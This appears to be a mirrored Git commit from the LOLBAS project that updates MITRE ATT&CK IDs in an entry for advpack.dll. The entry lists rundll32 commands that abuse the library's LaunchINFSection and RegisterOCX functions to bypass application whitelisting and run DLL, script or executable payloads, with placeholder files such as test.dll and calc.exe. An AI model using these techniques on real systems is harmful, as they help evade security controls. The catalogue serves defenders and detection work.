public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2025-07-29 05:31:53 +02:00
Code Issues Projects Releases Wiki Activity

MITRE ATT&CK realignment sprint

Browse Source
This commit is contained in:
Wietze
2021-11-05 18:58:26 +00:00
committed by GitHub
parent 97f5042a58
commit 4f7ec8d2af
159 changed files with 190 additions and 506 deletions
Download Patch File Download Diff File Expand all files Collapse all files

17
yml/OSLibraries/Advpack.yml
View File

@@ -9,39 +9,36 @@ Commands:
Usecase: Run local or remote script(let) code through INF file specification.
Category: AWL Bypass
Privileges: User
MitreID: T1085
MitreLink: https://attack.mitre.org/wiki/Technique/T1085
MitreID: T1218.011
OperatingSystem: Windows
- Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,,1,
Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied).
Usecase: Run local or remote script(let) code through INF file specification.
Category: AWL Bypass
Privileges: User
MitreID: T1085
MitreLink: https://attack.mitre.org/wiki/Technique/T1085
MitreID: T1218.011
OperatingSystem: Windows
- Command: rundll32.exe advpack.dll,RegisterOCX test.dll
Description: Launch a DLL payload by calling the RegisterOCX function.
Usecase: Load a DLL payload.
Category: Execute
Privileges: User
MitreID: T1085
MitreLink: https://attack.mitre.org/wiki/Technique/T1085
MitreID: T1218.011
OperatingSystem: Windows
- Command: rundll32.exe advpack.dll,RegisterOCX calc.exe
Description: Launch an executable by calling the RegisterOCX function.
Usecase: Run an executable payload.
Category: Execute
Privileges: User
MitreID: T1085
MitreLink: https://attack.mitre.org/wiki/Technique/T1085
MitreID: T1218.011
OperatingSystem: Windows
- Command: rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe"
Description: Launch command line by calling the RegisterOCX function.
Usecase: Run an executable payload.
Category: Execute
Privileges: User
MitreID: T1085
MitreLink: https://attack.mitre.org/wiki/Technique/T1085
MitreID: T1218.011
OperatingSystem: Windows 10
Full_Path:
- Path: c:\windows\system32\advpack.dll
- Path: c:\windows\syswow64\advpack.dll